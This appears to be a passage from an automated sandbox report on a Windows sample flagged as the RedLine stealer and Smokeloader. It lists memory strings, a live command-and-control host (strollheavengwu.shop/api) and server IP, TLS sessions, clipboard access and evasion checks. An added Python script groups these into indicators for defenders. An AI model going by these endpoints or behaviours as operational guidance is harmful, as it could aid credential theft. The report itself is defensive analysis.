Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1687686767.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679141291.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1658730673.000000000682F000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1659021463.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679306292.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1677973683.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679474150.0000000006830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/7
Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/9
Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/D
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1689473916.0000000004335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/api
Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/apiIF3
Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strollheavengwu.shop/apiN
            Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apib2
            Source: o7b91j8vnJ.exe, 00000000.00000003.1721593582.000000000434A000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845373777.000000000434C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apie
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apih02
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649788363.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apime
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apior
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apis
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/d
            Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/e
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1667240697.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/v
            Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/y
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
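The URL strings above mix two very different things: hosts the stealer copied out of browser profile data (search engines, Mozilla and Office help pages) and the host the sample itself talks to, which shows up in many separate memory regions and with a dozen path variants whose trailing characters (`/apiIF3`, `/apie`, `/apih02`) are just whatever bytes followed the real `/api` endpoint in memory. The script below is an added example, not Joe Sandbox code and not the sample's code: it parses evidence lines in the flattened form used on this page, groups URLs by host, folds the carved path variants onto the shortest observed prefix, and pairs the result with the TLS server seen in the HTTPS lines. The allowlist of benign browser hosts and the "seen in at least two memory regions" threshold are analyst assumptions; the embedded evidence is a constructed subset of the lines from this report.

```python
"""Turn Joe Sandbox evidence lines into network IOCs.

Added example for this report; it is not Joe Sandbox code and not the
sample's code. BENIGN_HOSTS is an analyst assumption: hosts that show up
because the stealer copied browser profile data (search engines, vendor
help pages), not because the sample talks to them.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed input: a subset of the evidence lines from this report, in the
# flattened "Source: <dumps>String found in binary or memory: <url>" form.
EVIDENCE = r"""
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1687686767.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1658730673.000000000682F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1689473916.0000000004335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/api
Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apiIF3
Source: o7b91j8vnJ.exe, 00000000.00000003.1721593582.000000000434A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apie
Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/y
Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49731 version: TLS 1.2
"""

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
REGION_RE = re.compile(r"\S+\.sdmp")
HTTPS_RE = re.compile(r"HTTPS traffic detected:\s*(\d+(?:\.\d+){3}):(\d+) -> "
                      r"(\d+(?:\.\d+){3}):(\d+) version: (TLS [\d.]+)")

BENIGN_HOSTS = {  # assumption: browser/vendor hosts carried in profile data
    "duckduckgo.com", "www.mozilla.org", "support.mozilla.org",
    "www.ecosia.org", "cdn.ecosia.org", "ch.search.yahoo.com",
    "www.google.com", "support.office.com",
}


def fold_path(path, observed):
    """Fold '/apiIF3' onto '/api' when '/api' was also observed.

    Strings carved from memory keep whatever bytes followed the real URL,
    so the shortest observed path that prefixes this one is the endpoint.
    """
    prefixes = [p for p in observed if len(p) > 1 and path.startswith(p)]
    return min(prefixes, key=len) if prefixes else path


def extract_iocs(text, min_regions=2):
    """Return ({host: {"regions": n, "paths": {path: count}}}, {server: [ports]}).

    A host counts as a C2 candidate when it is not on the allowlist and was
    seen in at least `min_regions` distinct memory regions.
    """
    by_host = defaultdict(lambda: {"regions": set(), "paths": []})
    for line in text.splitlines():
        m = STRING_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.scheme not in ("http", "https") or not url.hostname:
            continue
        entry = by_host[url.hostname]
        entry["regions"].update(REGION_RE.findall(line[:m.start()]))
        entry["paths"].append(url.path or "/")

    c2 = {}
    for host, entry in by_host.items():
        if host in BENIGN_HOSTS or len(entry["regions"]) < min_regions:
            continue
        seen = set(entry["paths"])
        folded = Counter(fold_path(p, seen) for p in entry["paths"])
        c2[host] = {"regions": len(entry["regions"]), "paths": dict(folded)}

    servers = defaultdict(list)  # (ip, port, tls version) -> client ports
    for m in HTTPS_RE.finditer(text):
        srv_ip, srv_port, _cli_ip, cli_port, ver = m.groups()
        servers[(srv_ip, int(srv_port), ver)].append(int(cli_port))
    return c2, dict(servers)


if __name__ == "__main__":
    hosts, tls = extract_iocs(EVIDENCE)
    for host, info in hosts.items():
        print(f"{host}: {info['regions']} memory regions, paths {info['paths']}")
    for (ip, port, ver), client_ports in tls.items():
        print(f"{ip}:{port} {ver}: {len(client_ports)} connections")
```

On the subset embedded above only strollheavengwu.shop survives the filter, with `/api` as the dominant folded path; the other variants (`/7`, `/9`, `/D`, `/d`, `/e`, `/v`, `/y`) are single leftover bytes and are best reported as the host alone. The 172.67.163.209 address belongs to the TLS server the sandbox observed, so it is a weaker indicator than the hostname: the report shows eight separate TLS 1.2 sessions to it, which is consistent with a stealer posting several exfiltration requests, but a shared hosting or CDN address should be blocked only together with the SNI/hostname.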

            System Summary

            Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00432010
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004204B7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00404740
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00420CA0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00406030
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00403260
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004052F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004065F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004345F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_0040F690
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004397D0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_0042594F
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_004259D2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00431A70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_0041CAEC
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00439AF0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00407CB0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00403D70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00402E70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D34C7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D55DB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D30D7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D1267
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D6297
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041F5C39
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_04201CD7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_04209D57
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D7F17
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041F0F07
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D3FD7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041DF824
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_04204857
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041DF8F7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D49A7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_04209A37
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041F5BB6
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: String function: 041D8F97 appears 168 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: String function: 00408D30 appears 168 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: String function: 041D8967 appears 48 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: String function: 00408700 appears 47 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
            Source: o7b91j8vnJ.exe, 00000000.00000000.1631441452.0000000004038000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exe, 00000000.00000003.1632124053.00000000042BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exe | Binary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_04265BD6 CreateToolhelp32Snapshot,Module32First
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00429597 CoCreateInstance
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\289d5835-1b8d-43c2-b257-a4bf03cf1062
            Source: o7b91j8vnJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650471952.000000000683C000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1650226468.0000000006858000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: o7b91j8vnJ.exe | Virustotal: Detection: 42%
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File read: C:\Users\user\Desktop\o7b91j8vnJ.exe
            Source: unknown | Process created: C:\Users\user\Desktop\o7b91j8vnJ.exe "C:\Users\user\Desktop\o7b91j8vnJ.exe"
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: o7b91j8vnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\makeba20\noxadikayovic.pdb source: o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: o7b91j8vnJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: o7b91j8vnJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: o7b91j8vnJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: o7b91j8vnJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Unpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Unpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_0043FBE7 push ecx; iretd 0_2_0043FBE8
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | System information queried: FirmwareTableInformation
